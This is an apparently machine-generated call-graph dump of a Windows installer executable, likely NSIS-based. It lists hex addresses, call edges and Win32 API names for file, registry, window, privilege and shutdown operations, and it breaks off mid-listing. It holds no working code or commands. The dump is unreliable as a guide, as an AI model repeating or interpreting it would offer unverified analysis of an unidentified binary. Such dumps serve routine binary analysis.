4052 401423 4032->4052 4041 40165b 4034->4041 4039 40164a SetCurrentDirectoryW 4039->4041 4040->4029 4040->4030 4042 401617 GetFileAttributesW 4040->4042 4044 40584f 4040->4044 4047 4057b5 CreateDirectoryW 4040->4047 4056 405832 CreateDirectoryW 4040->4056 4042->4040 4059 40665c GetModuleHandleA 4044->4059 4048 405802 4047->4048 4049 405806 GetLastError 4047->4049 4048->4040 4049->4048 4050 405815 SetFileSecurityW 4049->4050 4050->4048 4051 40582b GetLastError 4050->4051 4051->4048 4053 4052e6 24 API calls 4052->4053 4054 401431 4053->4054 4055 406282 lstrcpynW 4054->4055 4055->4039 4057 405842 4056->4057 4058 405846 GetLastError 4056->4058 4057->4040 4058->4057 4060 406682 GetProcAddress 4059->4060 4061 406678 4059->4061 4064 405856 4060->4064 4065 4065ec GetSystemDirectoryW 4061->4065 4063 40667e 4063->4060 4063->4064 4064->4040 4066 40660e wsprintfW LoadLibraryExW 4065->4066 4066->4063 4181 401e43 4189 402c15 4181->4189 4183 401e49 4184 402c15 17 API calls 4183->4184 4185 401e55 4184->4185 4186 401e61 ShowWindow 4185->4186 4187 401e6c EnableWindow 4185->4187 4188 402abf 4186->4188 4187->4188 4190 4062a4 17 API calls 4189->4190 4191 402c2a 4190->4191 4191->4183 4192 402644 4193 402c15 17 API calls 4192->4193 4201 402653 4193->4201 4194 402790 4195 40269d ReadFile 4195->4194 4195->4201 4196 402736 4196->4194 4196->4201 4206 405e55 SetFilePointer 4196->4206 4197 405df7 ReadFile 4197->4201 4199 402792 4215 4061c9 wsprintfW 4199->4215 4200 4026dd MultiByteToWideChar 4200->4201 4201->4194 4201->4195 4201->4196 4201->4197 4201->4199 4201->4200 4203 402703 SetFilePointer MultiByteToWideChar 4201->4203 4204 4027a3 4201->4204 4203->4201 4204->4194 4205 4027c4 SetFilePointer 4204->4205 4205->4194 4207 405e71 4206->4207 4212 405e8d 4206->4212 4208 405df7 ReadFile 4207->4208 4209 405e7d 4208->4209 4210 405e96 SetFilePointer 4209->4210 4211 405ebe SetFilePointer 4209->4211 4209->4212 4210->4211 4213 405ea1 4210->4213 4211->4212 4212->4196 4214 405e26 WriteFile 4213->4214 4214->4212 4215->4194 4226 402348 4227 402c37 17 API calls 4226->4227 4228 402357 4227->4228 4229 402c37 17 API calls 4228->4229 4230 402360 4229->4230 4231 402c37 17 API calls 4230->4231 4232 40236a GetPrivateProfileStringW 4231->4232 4935 4016cc 4936 402c37 17 API calls 4935->4936 4937 4016d2 GetFullPathNameW 4936->4937 4938 40170e 4937->4938 4939 4016ec 4937->4939 4940 401723 GetShortPathNameW 4938->4940 4941 402abf 4938->4941 4939->4938 4942 4065c5 2 API calls 4939->4942 4940->4941 4943 4016fe 4942->4943 4943->4938 4945 406282 lstrcpynW 4943->4945 4945->4938 4946 401b4d 4947 402c37 17 API calls 4946->4947 4948 401b54 4947->4948 4949 402c15 17 API calls 4948->4949 4950 401b5d wsprintfW 4949->4950 4951 402abf 4950->4951 4952 40394e 4953 403959 4952->4953 4954 403960 GlobalAlloc 4953->4954 4955 40395d 4953->4955 4954->4955 4956 401f52 4957 402c37 17 API calls 4956->4957 4958 401f59 4957->4958 4959 4065c5 2 API calls 4958->4959 4960 401f5f 4959->4960 4962 401f70 4960->4962 4963 4061c9 wsprintfW 4960->4963 4963->4962 4964 402253 4965 402c37 17 API calls 4964->4965 4966 402259 4965->4966 4967 402c37 17 API calls 4966->4967 4968 402262 4967->4968 4969 402c37 17 API calls 4968->4969 4970 40226b 4969->4970 4971 4065c5 2 API calls 4970->4971 4972 402274 4971->4972 4973 402285 lstrlenW lstrlenW 4972->4973 4977 402278 4972->4977 4974 4052e6 24 API calls 4973->4974 4976 4022c3 SHFileOperationW 4974->4976 4975 4052e6 24 API calls 4978 402280 4975->4978 4976->4977 4976->4978 4977->4975 4979 401956 4980 402c37 17 API calls 4979->4980 4981 40195d lstrlenW 4980->4981 4982 40258c 4981->4982 4983 4014d7 4984 402c15 17 API calls 4983->4984 4985 4014dd Sleep 4984->4985 4987 402abf 4985->4987 4988 4022d7 4989 4022de 4988->4989 4993 4022f1 4988->4993 4990 4062a4 17 API calls 4989->4990 4991 4022eb 4990->4991 4992 4058e4 MessageBoxIndirectW 4991->4992 4992->4993 4994 401d57 GetDlgItem GetClientRect 4995 402c37 17 API calls 4994->4995 4996 401d89 LoadImageW SendMessageW 4995->4996 4997 401da7 DeleteObject 4996->4997 4998 402abf 4996->4998 4997->4998 4999 402dd7 5000 402e02 4999->5000 5001 402de9 SetTimer 4999->5001 5002 402e57 5000->5002 5003 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5000->5003 5001->5000 5003->5002 4776 40525a 4777 40526a 4776->4777 4778 40527e 4776->4778 4779 405270 4777->4779 4789 4052c7 4777->4789 4780 405286 IsWindowVisible 4778->4780 4784 4052a6 4778->4784 4782 404263 SendMessageW 4779->4782 4783 405293 4780->4783 4780->4789 4781 4052cc CallWindowProcW 4785 40527a 4781->4785 4782->4785 4786 404bb0 5 API calls 4783->4786 4784->4781 4788 404c30 4 API calls 4784->4788 4787 40529d 4786->4787 4787->4784 4788->4789 4789->4781 4790 1000101b 4797 10001516 4790->4797 4792 10001020 4793 10001024 4792->4793 4794 10001027 GlobalAlloc 4792->4794 4795 1000153d 3 API calls 4793->4795 4794->4793 4796 1000103b 4795->4796 4799 1000151c 4797->4799 4798 10001522 4798->4792 4799->4798 4800 1000152e GlobalFree 4799->4800 4800->4792 4801 40175c 4802 402c37 17 API calls 4801->4802 4803 401763 4802->4803 4804 405da3 2 API calls 4803->4804 4805 40176a 4804->4805 4806 405da3 2 API calls 4805->4806 4806->4805 4807 4023de 4808 402c37 17 API calls 4807->4808 4809 4023f0 4808->4809 4810 402c37 17 API calls 4809->4810 4811 4023fa 4810->4811 4824 402cc7 4811->4824 4814 402432 4815 40243e 4814->4815 4818 402c15 17 API calls 4814->4818 4819 40245d RegSetValueExW 4815->4819 4821 4030fa 31 API calls 4815->4821 4816 402885 4817 402c37 17 API calls 4820 402428 lstrlenW 4817->4820 4818->4815 4822 402473 RegCloseKey 4819->4822 4820->4814 4821->4819 4822->4816 4825 402ce2 4824->4825 4828 40611d 4825->4828 4829 40612c 4828->4829 4830 40240a 4829->4830 4831 406137 RegCreateKeyExW 4829->4831 4830->4814 4830->4816 4830->4817 4831->4830 4068 404c62 GetDlgItem GetDlgItem 4069 404cb4 7 API calls 4068->4069 4077 404ecd 4068->4077 4070 404d57 DeleteObject 4069->4070 4071 404d4a SendMessageW 4069->4071 4072 404d60 4070->4072 4071->4070 4073 404d6f 4072->4073 4074 404d97 4072->4074 4075 4062a4 17 API calls 4073->4075 4124 404217 4074->4124 4080 404d79 SendMessageW SendMessageW 4075->4080 4076 404f92 4086 404fb1 4076->4086 4088 404fa3 SendMessageW 4076->4088 4077->4076 4083 404f2d 4077->4083 4077->4086 4079 40505d 4081 405067 SendMessageW 4079->4081 4082 40506f 4079->4082 4080->4072 4081->4082 4093 405081 ImageList_Destroy 4082->4093 4094 405088 4082->4094 4104 405098 4082->4104 4129 404bb0 SendMessageW 4083->4129 4084 404dab 4090 404217 18 API calls 4084->4090 4085 405245 4146 40427e 4085->4146 4086->4079 4086->4085 4091 40500a SendMessageW 4086->4091 4088->4086 4110 404db9 4090->4110 4091->4085 4095 40501f SendMessageW 4091->4095 4093->4094 4097 405091 GlobalFree 4094->4097 4094->4104 4099 405032 4095->4099 4096 405207 4096->4085 4100 405219 ShowWindow GetDlgItem ShowWindow 4096->4100 4097->4104 4098 404e8e GetWindowLongW SetWindowLongW 4101 404ea7 4098->4101 4105 405043 SendMessageW 4099->4105 4100->4085 4102 404ec5 4101->4102 4103 404ead ShowWindow 4101->4103 4128 40424c SendMessageW 4102->4128 4127 40424c SendMessageW 4103->4127 4104->4096 4119 4050d3 4104->4119 4134 404c30 4104->4134 4105->4079 4106 404e88 4106->4098 4106->4101 4109 404f3e 4109->4076 4110->4098 4110->4106 4111 404e09 SendMessageW 4110->4111 4112 404e45 SendMessageW 4110->4112 4113 404e56 SendMessageW 4110->4113 4111->4110 4112->4110 4113->4110 4115 404ec0 4115->4085 4116 4051dd InvalidateRect 4116->4096 4117 4051f3 4116->4117 4143 404b6b 4117->4143 4118 405101 SendMessageW 4120 405117 4118->4120 4119->4118 4119->4120 4120->4116 4121 405178 4120->4121 4123 40518b SendMessageW SendMessageW 4120->4123 4121->4123 4123->4120 4125 4062a4 17 API calls 4124->4125 4126 404222 SetDlgItemTextW 4125->4126 4126->4084 4127->4115 4128->4077 4130 404bd3 GetMessagePos ScreenToClient SendMessageW 4129->4130 4131 404c0f SendMessageW 4129->4131 4132 404c07 4130->4132 4133 404c0c 4130->4133 4131->4132 4132->4109 4133->4131 4160 406282 lstrcpynW 4134->4160 4136 404c43 4161 4061c9 wsprintfW 4136->4161 4138 404c4d 4162 40140b 4138->4162 4142 404c5d 4142->4119 4170 404aa2 4143->4170 4145 404b80 4145->4096 4147 404296 GetWindowLongW 4146->4147 4148 40431f 4146->4148 4147->4148 4149 4042a7 4147->4149 4150 4042b6 GetSysColor 4149->4150 4151 4042b9 4149->4151 4150->4151 4152 4042c9 SetBkMode 4151->4152 4153 4042bf SetTextColor 4151->4153 4154 4042e1 GetSysColor 4152->4154 4155 4042e7 4152->4155 4153->4152 4154->4155 4156 4042f8 4155->4156 4157 4042ee SetBkColor 4155->4157 4156->4148 4158 404312 CreateBrushIndirect 4156->4158 4159 40430b DeleteObject 4156->4159 4157->4156 4158->4148 4159->4158 4160->4136 4161->4138 4166 401389 4162->4166 4165 406282 lstrcpynW 4165->4142 4168 401390 4166->4168 4167 4013fe 4167->4165 4168->4167 4169 4013cb MulDiv SendMessageW 4168->4169 4169->4168 4171 404abb 4170->4171 4172 4062a4 17 API calls 4171->4172 4173 404b1f 4172->4173 4174 4062a4 17 API calls 4173->4174 4175 404b2a 4174->4175 4176 4062a4 17 API calls 4175->4176 4177 404b40 lstrlenW wsprintfW SetDlgItemTextW 4176->4177 4177->4145 5004 402862 5005 402c37 17 API calls 5004->5005 5006 402869 FindFirstFileW 5005->5006 5007 402891 5006->5007 5008 40287c 5006->5008 5012 4061c9 wsprintfW 5007->5012 5010 40289a 5013 406282 lstrcpynW 5010->5013 5012->5010 5013->5008 5014 401563 5015 402a65 5014->5015 5018 4061c9 wsprintfW 5015->5018 5017 402a6a 5018->5017 5019 404365 lstrlenW 5020 404384 5019->5020 5021 404386 WideCharToMultiByte 5019->5021 5020->5021 5022 4046e6 5023 404712 5022->5023 5024 404723 5022->5024 5083 4058c8 GetDlgItemTextW 5023->5083 5025 40472f GetDlgItem 5024->5025 5028 40478e 5024->5028 5027 404743 5025->5027 5032 404757 SetWindowTextW 5027->5032 5035 405bfe 4 API calls 5027->5035 5029 404872 5028->5029 5037 4062a4 17 API calls 5028->5037 5081 404a21 5028->5081 5029->5081 5085 4058c8 GetDlgItemTextW 5029->5085 5030 40471d 5031 406516 5 API calls 5030->5031 5031->5024 5036 404217 18 API calls 5032->5036 5034 40427e 8 API calls 5039 404a35 5034->5039 5040 40474d 5035->5040 5041 404773 5036->5041 5042 404802 SHBrowseForFolderW 5037->5042 5038 4048a2 5043 405c5b 18 API calls 5038->5043 5040->5032 5046 405b53 3 API calls 5040->5046 5044 404217 18 API calls 5041->5044 5042->5029 5045 40481a CoTaskMemFree 5042->5045 5049 4048a8 5043->5049 5047 404781 5044->5047 5048 405b53 3 API calls 5045->5048 5046->5032 5084 40424c SendMessageW 5047->5084 5051 404827 5048->5051 5086 406282 lstrcpynW 5049->5086 5054 40485e SetDlgItemTextW 5051->5054 5058 4062a4 17 API calls 5051->5058 5053 404787 5057 40665c 5 API calls 5053->5057 5054->5029 5055 4048bf 5056 40665c 5 API calls 5055->5056 5064 4048c6 5056->5064 5057->5028 5059 404846 lstrcmpiW 5058->5059 5059->5054 5061 404857 lstrcatW 5059->5061 5060 404907 5087 406282 lstrcpynW 5060->5087 5061->5054 5063 40490e 5065 405bfe 4 API calls 5063->5065 5064->5060 5069 405b9f 2 API calls 5064->5069 5070 40495f 5064->5070 5066 404914 GetDiskFreeSpaceW 5065->5066 5068 404938 MulDiv 5066->5068 5066->5070 5068->5070 5069->5064 5071 4049d0 5070->5071 5073 404b6b 20 API calls 5070->5073 5072 4049f3 5071->5072 5074 40140b 2 API calls 5071->5074 5088 404239 EnableWindow 5072->5088 5075 4049bd 5073->5075 5074->5072 5076 4049d2 SetDlgItemTextW 5075->5076 5077 4049c2 5075->5077 5076->5071 5079 404aa2 20 API calls 5077->5079 5079->5071 5080 404a0f 5080->5081 5089 40463f 5080->5089 5081->5034 5083->5030 5084->5053 5085->5038 5086->5055 5087->5063 5088->5080 5090 404652 SendMessageW 5089->5090 5091 40464d 5089->5091 5090->5081 5091->5090 5092 401968 5093 402c15 17 API calls 5092->5093 5094 40196f 5093->5094 5095 402c15 17 API calls 5094->5095 5096 40197c 5095->5096 5097 402c37 17 API calls 5096->5097 5098 401993 lstrlenW 5097->5098 5099 4019a4 5098->5099 5103 4019e5 5099->5103 5104 406282 lstrcpynW 5099->5104 5101 4019d5 5102 4019da lstrlenW 5101->5102 5101->5103 5102->5103 5104->5101 4267 4027e9 4268 4027f0 4267->4268 4270 402a6a 4267->4270 4269 402c15 17 API calls 4268->4269 4271 4027f7 4269->4271 4272 402806 SetFilePointer 4271->4272 4272->4270 4273 402816 4272->4273 4275 4061c9 wsprintfW 4273->4275 4275->4270 5105 100018a9 5106 100018cc 5105->5106 5107 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5106->5107 5108 100018ff GlobalFree 5106->5108 5109 10001272 2 API calls 5107->5109 5108->5107 5110 10001a87 GlobalFree GlobalFree 5109->5110 5111 40166a 5112 402c37 17 API calls 5111->5112 5113 401670 5112->5113 5114 4065c5 2 API calls 5113->5114 5115 401676 5114->5115 5116 401ced 5117 402c15 17 API calls 5116->5117 5118 401cf3 IsWindow 5117->5118 5119 401a20 5118->5119 4459 40176f 4460 402c37 17 API calls 4459->4460 4461 401776 4460->4461 4462 401796 4461->4462 4463 40179e 4461->4463 4519 406282 lstrcpynW 4462->4519 4520 406282 lstrcpynW 4463->4520 4466 40179c 4470 406516 5 API calls 4466->4470 4467 4017a9 4468 405b53 3 API calls 4467->4468 4469 4017af lstrcatW 4468->4469 4469->4466 4487 4017bb 4470->4487 4471 4065c5 2 API calls 4471->4487 4472 4017f7 4473 405d4f 2 API calls 4472->4473 4473->4487 4475 4017cd CompareFileTime 4475->4487 4476 40188d 4478 4052e6 24 API calls 4476->4478 4477 401864 4481 4052e6 24 API calls 4477->4481 4488 401879 4477->4488 4480 401897 4478->4480 4479 406282 lstrcpynW 4479->4487 4499 4030fa 4480->4499 4481->4488 4484 4018be SetFileTime 4486 4018d0 CloseHandle 4484->4486 4485 4062a4 17 API calls 4485->4487 4486->4488 4489 4018e1 4486->4489 4487->4471 4487->4472 4487->4475 4487->4476 4487->4477 4487->4479 4487->4485 4498 405d74 GetFileAttributesW CreateFileW 4487->4498 4521 4058e4 4487->4521 4490 4018e6 4489->4490 4491 4018f9 4489->4491 4493 4062a4 17 API calls 4490->4493 4492 4062a4 17 API calls 4491->4492 4494 401901 4492->4494 4496 4018ee lstrcatW 4493->4496 4497 4058e4 MessageBoxIndirectW 4494->4497 4496->4494 4497->4488 4498->4487 4501 403113 4499->4501 4500 403141 4525 403315 4500->4525 4501->4500 4528 40332b SetFilePointer 4501->4528 4505 4032ae 4507 4032f0 4505->4507 4511 4032b2 4505->4511 4506 40315e GetTickCount 4510 4018aa 4506->4510 4518 4031ad 4506->4518 4509 403315 ReadFile 4507->4509 4508 403315 ReadFile 4508->4518 4509->4510 4510->4484 4510->4486 4511->4510 4512 403315 ReadFile 4511->4512 4513 405e26 WriteFile 4511->4513 4512->4511 4513->4511 4514 403203 GetTickCount 4514->4518 4515 403228 MulDiv wsprintfW 4516 4052e6 24 API calls 4515->4516 4516->4518 4517 405e26 WriteFile 4517->4518 4518->4508 4518->4510 4518->4514 4518->4515 4518->4517 4519->4466 4520->4467 4522 4058f9 4521->4522 4523 405945 4522->4523 4524 40590d MessageBoxIndirectW 4522->4524 4523->4487 4524->4523 4526 405df7 ReadFile 4525->4526 4527 40314c 4526->4527 4527->4505 4527->4506 4527->4510 4528->4500 5120 402570 5121 402c37 17 API calls 5120->5121 5122 402577 5121->5122 5125 405d74 GetFileAttributesW CreateFileW 5122->5125 5124 402583 5125->5124 5126 401b71 5127 401bc2 5126->5127 5128 401b7e 5126->5128 5129 401bc7 5127->5129 5130 401bec GlobalAlloc 5127->5130 5131 401c07 5128->5131 5136 401b95 5128->5136 5140 4022f1 5129->5140 5147 406282 lstrcpynW 5129->5147 5133 4062a4 17 API calls 5130->5133 5132 4062a4 17 API calls 5131->5132 5131->5140 5135 4022eb 5132->5135 5133->5131 5139 4058e4 MessageBoxIndirectW 5135->5139 5145 406282 lstrcpynW 5136->5145 5137 401bd9 GlobalFree 5137->5140 5139->5140 5141 401ba4 5146 406282 lstrcpynW 5141->5146 5143 401bb3 5148 406282 lstrcpynW 5143->5148 5145->5141 5146->5143 5147->5137 5148->5140 5149 401a72 5150 402c15 17 API calls 5149->5150 5151 401a78 5150->5151 5152 402c15 17 API calls 5151->5152 5153 401a20 5152->5153 5154 4024f2 5155 402c77 17 API calls 5154->5155 5156 4024fc 5155->5156 5157 402c15 17 API calls 5156->5157 5158 402505 5157->5158 5159 402521 RegEnumKeyW 5158->5159 5160 40252d RegEnumValueW 5158->5160 5162 402885 5158->5162 5161 402542 RegCloseKey 5159->5161 5160->5161 5161->5162 4529 403373 SetErrorMode GetVersion 4530 4033b2 4529->4530 4531 4033b8 4529->4531 4532 40665c 5 API calls 4530->4532 4533 4065ec 3 API calls 4531->4533 4532->4531 4534 4033ce lstrlenA 4533->4534 4534->4531 4535 4033de 4534->4535 4536 40665c 5 API calls 4535->4536 4537 4033e5 4536->4537 4538 40665c 5 API calls 4537->4538 4539 4033ec 4538->4539 4540 40665c 5 API calls 4539->4540 4541 4033f8 #17 OleInitialize SHGetFileInfoW 4540->4541 4620 406282 lstrcpynW 4541->4620 4544 403444 GetCommandLineW 4621 406282 lstrcpynW 4544->4621 4546 403456 GetModuleHandleW 4547 40346e 4546->4547 4548 405b80 CharNextW 4547->4548 4549 40347d CharNextW 4548->4549 4550 4035a7 GetTempPathW 4549->4550 4559 403496 4549->4559 4622 403342 4550->4622 4552 4035bf 4553 4035c3 GetWindowsDirectoryW lstrcatW 4552->4553 4554 403619 DeleteFileW 4552->4554 4555 403342 12 API calls 4553->4555 4632 402ec1 GetTickCount GetModuleFileNameW 4554->4632 4558 4035df 4555->4558 4556 405b80 CharNextW 4556->4559 4558->4554 4561 4035e3 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4558->4561 4559->4556 4565 403592 4559->4565 4567 403590 4559->4567 4560 40362d 4562 4036e0 4560->4562 4563 4036d0 4560->4563 4568 405b80 CharNextW 4560->4568 4566 403342 12 API calls 4561->4566 4719 4038b6 4562->4719 4660 403990 4563->4660 4716 406282 lstrcpynW 4565->4716 4572 403611 4566->4572 4567->4550 4584 40364c 4568->4584 4572->4554 4572->4562 4573 40381a 4576 403822 GetCurrentProcess OpenProcessToken 4573->4576 4577 40389e ExitProcess 4573->4577 4574 4036fa 4575 4058e4 MessageBoxIndirectW 4574->4575 4581 403708 ExitProcess 4575->4581 4582 40383a LookupPrivilegeValueW AdjustTokenPrivileges 4576->4582 4583 40386e 4576->4583 4579 403710 4586 40584f 5 API calls 4579->4586 4580 4036aa 4585 405c5b 18 API calls 4580->4585 4582->4583 4587 40665c 5 API calls 4583->4587 4584->4579 4584->4580 4589 4036b6 4585->4589 4590 403715 lstrcatW 4586->4590 4588 403875 4587->4588 4591 40388a ExitWindowsEx 4588->4591 4594 403897 4588->4594 4589->4562 4717 406282 lstrcpynW 4589->4717 4592 403731 lstrcatW lstrcmpiW 4590->4592 4593 403726 lstrcatW 4590->4593 4591->4577 4591->4594 4592->4562 4596 40374d 4592->4596 4593->4592 4599 40140b 2 API calls 4594->4599 4597 403752 4596->4597 4598 403759 4596->4598 4601 4057b5 4 API calls 4597->4601 4602 405832 2 API calls 4598->4602 4599->4577 4600 4036c5 4718 406282 lstrcpynW 4600->4718 4604 403757 4601->4604 4605 40375e SetCurrentDirectoryW 4602->4605 4604->4605 4606 403779 4605->4606 4607 40376e 4605->4607 4727 406282 lstrcpynW 4606->4727 4726 406282 lstrcpynW 4607->4726 4610 4062a4 17 API calls 4611 4037b8 DeleteFileW 4610->4611 4612 4037c5 CopyFileW 4611->4612 4617 403787 4611->4617 4612->4617 4613 40380e 4615 406048 36 API calls 4613->4615 4614 406048 36 API calls 4614->4617 4615->4562 4616 4062a4 17 API calls 4616->4617 4617->4610 4617->4613 4617->4614 4617->4616 4618 405867 2 API calls 4617->4618 4619 4037f9 CloseHandle 4617->4619 4618->4617 4619->4617 4620->4544 4621->4546 4623 406516 5 API calls 4622->4623 4624 40334e 4623->4624 4625 403358 4624->4625 4626 405b53 3 API calls 4624->4626 4625->4552 4627 403360 4626->4627 4628 405832 2 API calls 4627->4628 4629 403366 4628->4629 4728 405da3 4629->4728 4732 405d74 GetFileAttributesW CreateFileW 4632->4732 4634 402f01 4653 402f11 4634->4653 4733 406282 lstrcpynW 4634->4733 4636 402f27 4637 405b9f 2 API calls 4636->4637 4638 402f2d 4637->4638 4734 406282 lstrcpynW 4638->4734 4640 402f38 GetFileSize 4641 403034 4640->4641 4659 402f4f 4640->4659 4735 402e5d 4641->4735 4643 40303d 4645 40306d GlobalAlloc 4643->4645 4643->4653 4747 40332b SetFilePointer 4643->4747 4644 403315 ReadFile 4644->4659 4746 40332b SetFilePointer 4645->4746 4648 4030a0 4650 402e5d 6 API calls 4648->4650 4649 403088 4652 4030fa 31 API calls 4649->4652 4650->4653 4651 403056 4654 403315 ReadFile 4651->4654 4657 403094 4652->4657 4653->4560 4656 403061 4654->4656 4655 402e5d 6 API calls 4655->4659 4656->4645 4656->4653 4657->4653 4657->4657 4658 4030d1 SetFilePointer 4657->4658 4658->4653 4659->4641 4659->4644 4659->4648 4659->4653 4659->4655 4661 40665c 5 API calls 4660->4661 4662 4039a4 4661->4662 4663 4039aa 4662->4663 4664 4039bc 4662->4664 4756 4061c9 wsprintfW 4663->4756 4665 406150 3 API calls 4664->4665 4666 4039ec 4665->4666 4668 403a0b lstrcatW 4666->4668 4670 406150 3 API calls 4666->4670 4669 4039ba 4668->4669 4748 403c66 4669->4748 4670->4668 4673 405c5b 18 API calls 4674 403a3d 4673->4674 4675 403ad1 4674->4675 4677 406150 3 API calls 4674->4677 4676 405c5b 18 API calls 4675->4676 4678 403ad7 4676->4678 4679 403a6f 4677->4679 4680 403ae7 LoadImageW 4678->4680 4681 4062a4 17 API calls 4678->4681 4679->4675 4684 403a90 lstrlenW 4679->4684 4688 405b80 CharNextW 4679->4688 4682 403b8d 4680->4682 4683 403b0e RegisterClassW 4680->4683 4681->4680 4687 40140b 2 API calls 4682->4687 4685 403b44 SystemParametersInfoW CreateWindowExW 4683->4685 4686 403b97 4683->4686 4689 403ac4 4684->4689 4690 403a9e lstrcmpiW 4684->4690 4685->4682 4686->4562 4691 403b93 4687->4691 4693 403a8d 4688->4693 4692 405b53 3 API calls 4689->4692 4690->4689 4694 403aae GetFileAttributesW 4690->4694 4691->4686 4695 403c66 18 API calls 4691->4695 4696 403aca 4692->4696 4693->4684 4697 403aba 4694->4697 4698 403ba4 4695->4698 4757 406282 lstrcpynW 4696->4757 4697->4689 4700 405b9f 2 API calls 4697->4700 4701 403bb0 ShowWindow 4698->4701 4702 403c33 4698->4702 4700->4689 4704 4065ec 3 API calls 4701->4704 4758 4053b9 OleInitialize 4702->4758 4709 403bc8 4704->4709 4705 403c39 4706 403c55 4705->4706 4707 403c3d 4705->4707 4710 40140b 2 API calls 4706->4710 4707->4686 4714 40140b 2 API calls 4707->4714 4708 403bd6 GetClassInfoW 4712 403c00 DialogBoxParamW 4708->4712 4713 403bea GetClassInfoW RegisterClassW 4708->4713 4709->4708 4711 4065ec 3 API calls 4709->4711 4710->4686 4711->4708 4715 40140b 2 API calls 4712->4715 4713->4712 4714->4686 4715->4686 4716->4567 4717->4600 4718->4563 4720 4038c0 CloseHandle 4719->4720 4721 4038ce 4719->4721 4720->4721 4772 4038fb 4721->4772 4724 405990 67 API calls 4725 4036e9 OleUninitialize 4724->4725 4725->4573 4725->4574 4726->4606 4727->4617 4729 405db0 GetTickCount GetTempFileNameW 4728->4729 4730 403371 4729->4730 4731 405de6 4729->4731 4730->4552 4731->4729 4731->4730 4732->4634 4733->4636 4734->4640 4736 402e66 4735->4736 4737 402e7e 4735->4737 4738 402e76 4736->4738 4739 402e6f DestroyWindow 4736->4739 4740 402e86 4737->4740 4741 402e8e GetTickCount 4737->4741 4738->4643 4739->4738 4742 406698 2 API calls 4740->4742 4743 402e9c CreateDialogParamW ShowWindow 4741->4743 4744 402ebf 4741->4744 4745 402e8c 4742->4745 4743->4744 4744->4643 4745->4643 4746->4649 4747->4651 4749 403c7a 4748->4749 4765 4061c9 wsprintfW 4749->4765 4751 403ceb 4766 403d1f 4751->4766 4753 403a1b 4753->4673 4754 403cf0 4754->4753 4755 4062a4 17 API calls 4754->4755 4755->4754 4756->4669 4757->4675 4769 404263 4758->4769 4760 4053dc 4763 405403 4760->4763 4764 401389 2 API calls 4760->4764 4761 404263 SendMessageW 4762 405415 OleUninitialize 4761->4762 4762->4705 4763->4761 4764->4760 4765->4751 4767 4062a4 17 API calls 4766->4767 4768 403d2d SetWindowTextW 4767->4768 4768->4754 4770 40427b 4769->4770 4771 40426c SendMessageW 4769->4771 4770->4760 4771->4770 4773 403909 4772->4773 4774 40390e FreeLibrary GlobalFree 4773->4774 4775 4038d3 4773->4775 4774->4774 4774->4775 4775->4724 5164 401573 5165 401583 ShowWindow 5164->5165 5166 40158c 5164->5166 5165->5166 5167 40159a ShowWindow 5166->5167 5168 402abf 5166->5168 5167->5168 5169 4014f5 SetForegroundWindow 5170 402abf 5169->5170 5171 100016b6 5172 100016e5 5171->5172 5173 10001b18 22 API calls 5172->5173 5174 100016ec 5173->5174 5175 100016f3 5174->5175 5176 100016ff 5174->5176 5179 10001272 2 API calls 5175->5179 5177 10001726 5176->5177 5178 10001709 5176->5178 5181 10001750 5177->5181 5182 1000172c 5177->5182 5180 1000153d 3 API calls 5178->5180 5183 100016fd 5179->5183 5184 1000170e 5180->5184 5186 1000153d 3 API calls 5181->5186 5185 100015b4 3 API calls 5182->5185 5187 100015b4 3 API calls 5184->5187 5188 10001731 5185->5188 5186->5183 5189 10001714 5187->5189 5190 10001272 2 API calls 5188->5190 5191 10001272 2 API calls 5189->5191 5192 10001737 GlobalFree 5190->5192 5193 1000171a GlobalFree 5191->5193 5192->5183 5194 1000174b GlobalFree 5192->5194 5193->5183 5194->5183 5195 401e77 5196 402c37 17 API calls 5195->5196 5197 401e7d 5196->5197 5198 402c37 17 API calls 5197->5198 5199 401e86 5198->5199 5200 402c37 17 API calls 5199->5200 5201 401e8f 5200->5201 5202 402c37 17 API calls 5201->5202 5203 401e98 5202->5203 5204 401423 24 API calls 5203->5204 5205 401e9f 5204->5205 5212 4058aa ShellExecuteExW 5205->5212 5207 401ee1 5208 40670d 5 API calls 5207->5208 5210 402885 5207->5210 5209 401efb CloseHandle 5208->5209 5209->5210 5212->5207 5213 10002238 5214 10002296 5213->5214 5215 100022cc 5213->5215 5214->5215 5216 100022a8 GlobalAlloc 5214->5216 5216->5214 5217 40167b 5218 402c37 17 API calls 5217->5218 5219 401682 5218->5219 5220 402c37 17 API calls 5219->5220 5221 40168b 5220->5221 5222 402c37 17 API calls 5221->5222 5223 401694 MoveFileW 5222->5223 5224 4016a0 5223->5224 5225 4016a7 5223->5225 5226 401423 24 API calls 5224->5226 5227 4065c5 2 API calls 5225->5227 5229 40224a 5225->5229 5226->5229 5228 4016b6 5227->5228 5228->5229 5230 406048 36 API calls 5228->5230 5230->5224 5231 1000103d 5232 1000101b 5 API calls 5231->5232 5233 10001056 5232->5233 4832 40247e 4833 402c77 17 API calls 4832->4833 4834 402488 4833->4834 4835 402c37 17 API calls 4834->4835 4836 402491 4835->4836 4837 40249c RegQueryValueExW 4836->4837 4840 402885 4836->4840 4838 4024c2 RegCloseKey 4837->4838 4839 4024bc 4837->4839 4838->4840 4839->4838 4843 4061c9 wsprintfW 4839->4843 4843->4838 5234 4020fe 5235 402c37 17 API calls 5234->5235 5236 402105 5235->5236 5237 402c37 17 API calls 5236->5237 5238 40210f 5237->5238 5239 402c37 17 API calls 5238->5239 5240 402119 5239->5240 5241 402c37 17 API calls 5240->5241 5242 402123 5241->5242 5243 402c37 17 API calls 5242->5243 5244 40212d 5243->5244 5245 40216c CoCreateInstance 5244->5245 5246 402c37 17 API calls 5244->5246 5249 40218b 5245->5249 5246->5245 5247 401423 24 API calls 5248 40224a 5247->5248 5249->5247 5249->5248 5250 4019ff 5251 402c37 17 API calls 5250->5251 5252 401a06 5251->5252 5253 402c37 17 API calls 5252->5253 5254 401a0f 5253->5254 5255 401a16 lstrcmpiW 5254->5255 5256 401a28 lstrcmpW 5254->5256 5257 401a1c 5255->5257 5256->5257 3807 401f00 3822 402c37 3807->3822 3816 401f2b 3818 401f30 3816->3818 3819 401f3b 3816->3819 3817 402885 3847 4061c9 wsprintfW 3818->3847 3821 401f39 CloseHandle 3819->3821 3821->3817 3823 402c43 3822->3823 3848 4062a4 3823->3848 3826 401f06 3828 4052e6 3826->3828 3829 405301 3828->3829 3837 401f10 3828->3837 3830 40531d lstrlenW 3829->3830 3833 